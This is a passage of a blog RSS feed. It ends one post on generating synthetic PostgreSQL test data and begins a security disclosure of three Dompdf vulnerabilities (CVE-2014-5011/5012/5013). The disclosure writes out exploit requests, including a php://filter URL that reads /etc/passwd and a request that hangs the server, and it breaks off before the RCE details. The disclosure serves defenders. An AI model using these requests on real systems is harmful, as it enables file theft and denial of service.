        &lt;span class=&quot;p&quot;&gt;[&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;..&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;Here&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;first&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;name&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;generator&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;...&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;),&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;-- name_last&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
        &lt;span class=&quot;p&quot;&gt;[&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;..&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;Here&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;last&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;name&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;generator&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;...&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;),&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;-- con_status&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
        &lt;span class=&quot;p&quot;&gt;[&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;..&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;Here&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;status&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;enum&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;choice&lt;/span&gt;  &lt;span class=&quot;n&quot;&gt;generator&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;...&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;),&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;-- comp_id (used for joining company table, adding comp_name on email&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;select&lt;/span&gt;  &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;random&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;10000&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)::&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;int&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;generator&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;comp_id&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;),&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;-- base_date_num (used for joining dates1083 pseudo-table, and computing others dates from that&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;select&lt;/span&gt;  &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;random&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;1083&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)::&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;int&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;generator&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;base_date_num&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;),&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;-- con_active, something like 10% of false (inactive)&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;select&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;((&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;random&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;10&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;generator&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)::&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;boolean&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;con_active&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;),&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;-- has_1st interaction something like 95%&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;select&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;((&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;random&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;100&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;generator&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;5&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)::&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;boolean&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;has_1st_interact&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;),&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;-- has_2nd interaction something like 65%&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;select&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;((&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;random&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;100&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;generator&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;35&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)::&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;boolean&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;has_2nd_interact&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;),&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;-- let&amp;#39;s hide some non required fields sometimes&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;-- hiding 5 % of last_names&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;select&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;((&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;random&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;100&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;generator&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;5&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)::&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;boolean&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;show_last_name&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;),&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;-- hiding 5 % of first_names&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;select&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;((&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;random&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;100&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;generator&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;5&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)::&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;boolean&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;show_first_name&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;),&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;-- id&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;generator&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;id&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;FROM&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;generate_series&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;generator&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;main_sub&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;INNER&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;JOIN&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;company&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;ON&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;company&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;comp_id&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;main_sub&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;comp_id&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;INNER&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;JOIN&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;dates1083&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;ON&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;dates1083&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;rownum&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;main_sub&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;base_date_num&lt;/span&gt;
&lt;span class=&quot;c1&quot;&gt;-- ignore conflicts of ids, but not any checks constraint failure (on dates for example)&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;ON&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;CONFLICT&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;DO&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;NOTHING&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;Here is &lt;a href=&quot;https://github.com/regilero/regilero.github.com/blob/master/theme/resource/pgserie/generating_contacts.sql&quot;&gt;the full and commented version, without the INSERT part&lt;/a&gt;.
There&#39;s a lot of elements inside, my advice is to copy that in a pgadmin SQL session and to play with the various columns.
You have siome booleans generated on subqueries, allowing choices adjustemnts with &lt;code&gt;CASE&lt;/code&gt; on the top queries,
to get more various profils, to insert some &lt;code&gt;NULL&lt;/code&gt; sometimes on some non required columns, etc.&lt;/p&gt;

&lt;p&gt;We can of course &lt;a href=&quot;http://sqlfiddle.com/#!17/ec332/2&quot;&gt;see it in SQL Fiddle&lt;/a&gt; where
the model is already present, as we need the company table to get the right email column.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt; id  | con_active | con_first_name |   con_last_name    |                        mail                        |          date_create          |       date_1st_interact       |       date_2nd_interact       |          date_alter           | con_status | comp_id
-----+------------+----------------+--------------------+----------------------------------------------------+-------------------------------+-------------------------------+-------------------------------+-------------------------------+------------+---------
   1 | t          | Coaïco         | Takalaerjac        | coaico.takalaerjac@cocaco-global.com               | 2017-06-16 10:41:28.631596+02 | 2017-06-21 04:01:28.631596+02 | 2017-06-27 18:39:28.631596+02 | 2017-06-27 18:39:28.631596+02 | commercial |    4091
   2 | t          | Nnn            | Otoerkingchen      | nnn.otoerkingchen@sefrafor-international.com       | 2016-03-12 04:25:28.631596+01 | 2016-03-15 07:34:28.631596+01 | 2016-10-22 05:57:28.631596+02 | 2016-10-22 05:57:28.631596+02 | external   |    6055
   3 | t          | Cosyso         | Steinroytakavur    | cosyso.steinroytakavur@gecgipfor-global.com        | 2016-12-16 10:35:28.631596+01 | 2016-12-18 18:11:28.631596+01 | 2016-12-18 18:11:28.631596+01 | 2016-12-18 18:11:28.631596+01 | production |     651
   4 | t          | Michavir       | Ersteinotovur      | michavir.ersteinotovur@gefroca-international.com   | 2012-10-29 12:27:28.631596+01 | 2012-11-03 10:41:28.631596+01 | 2013-06-19 11:21:28.631596+02 | 2013-06-19 11:21:28.631596+02 | external   |    2731
   6 | t          | Ennathche      | Latakamcata        | ennathche.latakamcata@gecforgim-united.com         | 2016-12-15 12:29:28.631596+01 | 2016-12-19 11:12:28.631596+01 | 2017-06-27 18:39:28.631596+02 | 2017-06-27 18:39:28.631596+02 | external   |    8740
   8 | f          |                | Durjactakao&#39;       | borob.durjactakao-@forfrafor-gmbh.com              | 2014-01-13 16:36:28.631596+01 | 2014-01-17 19:08:28.631596+01 | 2014-01-17 19:08:28.631596+01 | 2014-01-17 19:08:28.631596+01 | external   |    1902
   9 | t          | Jamibo         | Jacsteinlason      | jamibo.jacsteinlason@gimgipgim-international.com   | 2011-11-30 08:29:28.631596+01 |                               |                               | 2011-11-30 08:29:28.631596+01 | support    |    3024
  10 | t          | Nathhnnath     | Vurfürsteinking    | nathhnnath.vurfursteinking@sosegip-sons.com        | 2014-08-29 00:10:28.631596+02 | 2014-09-04 05:25:28.631596+02 | 2014-09-04 05:25:28.631596+02 | 2014-09-04 05:25:28.631596+02 | support    |    6006
  13 | t          | Chepeche       | Kleindurotoking    | chepeche.kleindurotoking@sogegec-global.com        | 2011-07-25 03:06:28.631596+02 | 2011-07-28 14:17:28.631596+02 | 2013-08-08 10:32:28.631596+02 | 2013-08-08 10:32:28.631596+02 | direction  |     477
(...)
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;We&#39;ll then need to insert those lines into the contact table. As we could see before on the above pseudo-query.
After the &lt;code&gt;WITH&lt;/code&gt; section we have a &lt;code&gt;SELECT&lt;/code&gt; query, the &lt;code&gt;INSERT INTO contact&lt;/code&gt; part has to be paste just before this select.
At the end we have &lt;a href=&quot;https://github.com/regilero/regilero.github.com/blob/master/theme/resource/pgserie/contacts_insertion.sql#L40-L52&quot;&gt;this insert query&lt;/a&gt;,
where we also add the &lt;code&gt;ON CONFLICT DO NOTHING;&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Then I can insert &lt;strong&gt;1,000&lt;/strong&gt;, &lt;strong&gt;10,000&lt;/strong&gt; or &lt;strong&gt;100,000 contacts&lt;/strong&gt; by simply altering the digits in the last &lt;code&gt;generate_series&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;For SQL Fiddle the model definition and these queries reached the size limit (8000)
so UI had to remove some indexes and some formating and comments, but &lt;a href=&quot;http://sqlfiddle.com/#!17/93004/7&quot;&gt;it works !&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can also &lt;a href=&quot;http://sqlfiddle.com/#!17/93004/8&quot;&gt;list some contacts&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Or start to work on &lt;a href=&quot;http://sqlfiddle.com/#!17/93004/6&quot;&gt;some complex query from an application&lt;/a&gt;.
&lt;strong&gt;Since the goal is normally to find the right indexes&lt;/strong&gt;.&lt;/p&gt;

&lt;h2&gt;Why, by the way?&lt;/h2&gt;

&lt;p&gt;Generating datas based on a &lt;strong&gt;realistic physiognomy of data&lt;/strong&gt; and on &lt;strong&gt;large assemblies&lt;/strong&gt;
will help us validate an indexation scheme, and optimize explains.&lt;/p&gt;

&lt;p&gt;The query shown in &lt;a href=&quot;http://sqlfiddle.com/#!17/93004/6&quot;&gt;this previous Fidlle&lt;/a&gt; and also available &lt;a href=&quot;https://github.com/regilero/regilero.github.com/blob/master/theme/resource/pgserie/query_example.sql&quot;&gt;directly here&lt;/a&gt; is quite awful to optimize, with &lt;code&gt;WINDOW&lt;/code&gt; usage, some subselects, etc.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://regilero.github.io/theme/resource/pgserie/explain1.png&quot;&gt;&lt;/p&gt;

&lt;p&gt;On the other hand, depending on the presence or absence of certain indexes (like the dates partial indexes),
we can obtain some very different explain schemes:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://regilero.github.io/theme/resource/pgserie/explain2.png&quot;&gt;&lt;/p&gt;

&lt;p&gt;But that&#39;s another story.&lt;/p&gt;

&lt;h2&gt;Bonus&lt;/h2&gt;

&lt;p&gt;Of course variations on the examples can be made. Here is a link to a &lt;a href=&quot;https://gist.github.com/regilero/e0066e66e2c505f7a0edddf8bf104bb7&quot;&gt;hoity-toity french names generator&lt;/a&gt;.&lt;/p&gt;
</description>
				<published>2017-06-26 00:00:00 +0200</published>
				<link>http://regilero.github.io/english/postgresql/2017/06/26/postgresql_advanced_generate_series/</link>
			</item>
		
			<item>
				<title>Web Security, Dompdf security issues details</title>
				<description>&lt;p&gt;&lt;small&gt;&lt;strong&gt;English version&lt;/strong&gt; (&lt;strong&gt;Version Française&lt;/strong&gt; disponible sur &lt;a href=&quot;http://www.makina-corpus.com/blog/metier/2016/securite-web-detail-de-failles-de-securite-dompdf&quot;&gt;makina corpus&lt;/a&gt;).&lt;/small&gt;
&lt;small&gt;estimated read time: 5min&lt;/small&gt;&lt;/p&gt;

&lt;h2&gt;Dompdf?&lt;/h2&gt;

&lt;p&gt;If you do not know &lt;a href=&quot;https://github.com/dompdf/dompdf&quot;&gt;DomPDF&lt;/a&gt;, that&#39;s a really nice library to render PDF document with PHP scripts.
I mean it, for anyone which already have had to use some other HTML to PDF converters, this library looks very nice.&lt;/p&gt;

&lt;p&gt;Now, this lib made a thing that I consider a huge mistake for a library,
they provided, for years, a nice gui, directly in the library. From this GUI you
could check your settings, test the library tools, etc.&lt;/p&gt;

&lt;p&gt;This looks like a nice tool, and in term of pure marketing (targeted to
developers and integrators), that&#39;s a really powerful utility.&lt;/p&gt;

&lt;p&gt;But in the past this has lead to some security issues, like this &lt;a href=&quot;https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/&quot;&gt;CVE-2014-2383&lt;/a&gt;,
&quot;Information disclosure, arbitrary file read&quot;.&lt;/p&gt;

&lt;p&gt;And in this post I&#39;ll describe 3 new CVE, discovered after this one, first
reported to the project in june 2014, and fixed in version 0.6.2 in december 2015 (so, almost 2016).&lt;/p&gt;

&lt;p&gt;Note that the &lt;strong&gt;0.7 branch is not impacted&lt;/strong&gt;. Note also that the CVE year is 2014,
but anything downloaded before end of december 2015 was quite certainly impacted.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5011&quot;&gt;CVE-2014-5011&lt;/a&gt; : Information Disclosure&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5012&quot;&gt;CVE-2014-5012&lt;/a&gt; : DOS (Deny of Service)&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5013&quot;&gt;CVE-2014-5013&lt;/a&gt; : RCE (Remote Code Execution), complement of CVE-2014-2383&lt;/li&gt;
&lt;/ul&gt;


&lt;h3&gt;fixed in 0.6.2 ?&lt;/h3&gt;

&lt;p&gt;if you check the &lt;a href=&quot;https://github.com/dompdf/dompdf/releases&quot;&gt;RELEASES&lt;/a&gt; page of the project, and download versions 0.6.0, 0.6.1 and 0.6.2,
to check the differences, you will lose part of the real history.
Version 0.6.1 has been fixed in github fixed after initial release.
You can have a different 0.6.1 version if you downloaded it before.&lt;/p&gt;

&lt;p&gt;The RCE issue has been removed from 0.6.1 but was in fact present in this
version if you downloaded it before (quite certainly before december 2015).&lt;/p&gt;

&lt;h2&gt;CVE-2014-5011 : Information Disclosure&lt;/h2&gt;

&lt;p&gt;This issue is the easy one.&lt;/p&gt;

&lt;p&gt;The library has long been releasing a &lt;code&gt;www&lt;/code&gt; directory, with some PHP files inside.&lt;/p&gt;

&lt;p&gt;Most PHP installation will run any PHP set in the web document root (&lt;strong&gt;note that
it&#39;s a good security thing to avoid that and restrict PHP execution to the bootstrapper
only -- &lt;code&gt;index.php&lt;/code&gt; --&lt;/strong&gt;, if you can, and if your application is modern you certainly could, unless
it&#39;s Drupal8, because, because, I don&#39;t know why they keep putting all libraries
and all PHP sources in the document root, please help me close this parenthesis).&lt;/p&gt;

&lt;p&gt;So, you have this directory, with a lot of PHP scripts available. And one of these
scripts is &lt;code&gt;www/setup.php&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;This script is the definition of an &lt;strong&gt;information Disclosure&lt;/strong&gt;, with real versions
and paths printed on a public page:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/theme/img/posts/yes1.png&quot; width=&quot;1000&quot; height=&quot;648&quot; alt=&quot;gimme some data&quot;/&gt;&lt;/p&gt;

&lt;p&gt;Look at some of theses settings:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/theme/img/posts/yes2.png&quot; width=&quot;924&quot; height=&quot;247&quot; alt=&quot;oyeah, gimme more&quot;/&gt;&lt;/p&gt;

&lt;p&gt;Various fix has been applied on this issue, mainly restricting access on &lt;em&gt;setup&lt;/em&gt;
and some other places to localhost only, so that these pages should not be indexed
by google anymore, and that no hacker could use it to inspect your application
security level so easily.&lt;/p&gt;

&lt;p&gt;Some other informations leaks were available at &lt;code&gt;www/debugger.php&lt;/code&gt; and &lt;code&gt;www/fonts.php&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;We&#39;ll see below with the RCE that this disclosure is a really big problem if
some settings are not at the right value.&lt;/p&gt;

&lt;h2&gt;CVE-2014-5012: Deny of Service&lt;/h2&gt;

&lt;p&gt;The library provide an example of implementation, used in the GUI screens,
especially on a demonstration page.&lt;/p&gt;

&lt;p&gt;This script is &lt;code&gt;dompdf.php&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;You can try to use it on some very heavy examples, like the full utf-8 render.
Costly public script, but not enough for a realy DOS vector.&lt;/p&gt;

&lt;p&gt;But a real not-nice-at-all-call is requesting the render of the dompdf configuration file (I first
tried it to check if I would get a pdf with the library settings rendered):&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;dompdf/dompdf.php?base_path=&amp;amp;options[Attachment]=0&amp;amp;input_file=dompdf_config.inc.php
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Something goes wrong while dompdf is trying to render this file, and the
script will never end his task (not until php max memory is reached).&lt;/p&gt;

&lt;p&gt;That&#39;s a better Deny of Service vector.&lt;/p&gt;

&lt;h2&gt;And now a Remote command execution ...&lt;/h2&gt;

&lt;h3&gt;Back to the old CVE-2014-2383&lt;/h3&gt;

&lt;p&gt;This previous CVE &lt;a href=&quot;https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/&quot;&gt;CVE-2014-2383&lt;/a&gt; (which is not mine) was available on
version 0.6.0 (now a really old version).&lt;/p&gt;

&lt;p&gt;The attack used &lt;code&gt;php://filter&lt;/code&gt; to extract any file readable by PHP on the server
(open_basedir is a limitation on which file are available, and finding path to files is not always easy, but refer to the
Information Disclosure problem for a full access to open_basedir setting value or paths).&lt;/p&gt;

&lt;p&gt;It also used the &lt;code&gt;dompdf.php&lt;/code&gt; file, present in the library, which is necessary for
the gui demonstrations, but is in fact useless for most dompdf integration (it
means one of the simplest way of fixing this issue, the DOS and the RCE is to
remove this file).&lt;/p&gt;

&lt;p&gt;Say, if you want to read the &lt;code&gt;/etc/passwd&lt;/code&gt; file you can try something like
&lt;code&gt;/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd&lt;/code&gt; and
the result, in a PDF document, is this file, simply base64 encoded (use base64
decode and you have the file content). The &lt;em&gt;&lt;code&gt;php://filter+base64&lt;/code&gt;&lt;/em&gt; trick is the
new way of doing local file inclusions with modern PHP.&lt;/p&gt;

&lt;p&gt;This issue was fixed in 0.6.1.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;php://&lt;/code&gt; filter support was removed.&lt;/p&gt;

&lt;h3&gt;CVE-2014-5013 RCE: exploit data uri instead of php:// filter&lt;/h3&gt;

&lt;p&gt;An RCE, or Remote Code Execution is a very bad issue. It means attackers can run
their own PHP code on your server. From that you cannot do a lot of things.&lt;/p&gt;

&lt;p&gt;Before giving the details, I&#39;ll give the first counter measures.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Do not allow &lt;code&gt;DOMPDF_ENABLE_PHP&lt;/code&gt;&lt;/strong&gt; : that&#39;s the default setting, it&#39;s forbidden
by default, if you ever enabled that please remove it, right now. This setting&#39;s default
protected you from the previous &lt;code&gt;php://&lt;/code&gt; filter attack also.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Do not allow &lt;code&gt;DOMPDF_ENABLE_REMOTE&lt;/code&gt;&lt;/strong&gt; : same thing, default is false, if you
set true remove it, right now, or set your dompdf version to 0.6.2 or greater.&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;Note that the Information Disclosure issue &lt;strong&gt;will&lt;/strong&gt; reveal theses settings to
everybody, even google.&lt;/p&gt;

&lt;p&gt;Let&#39;s first have a look at theses strange settings, that you should not allow,
from the config file:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-php&quot; data-lang=&quot;php&quot;&gt;&lt;span class=&quot;x&quot;&gt;/**&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt;* Enable inline PHP&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt;*&lt;/span&gt;
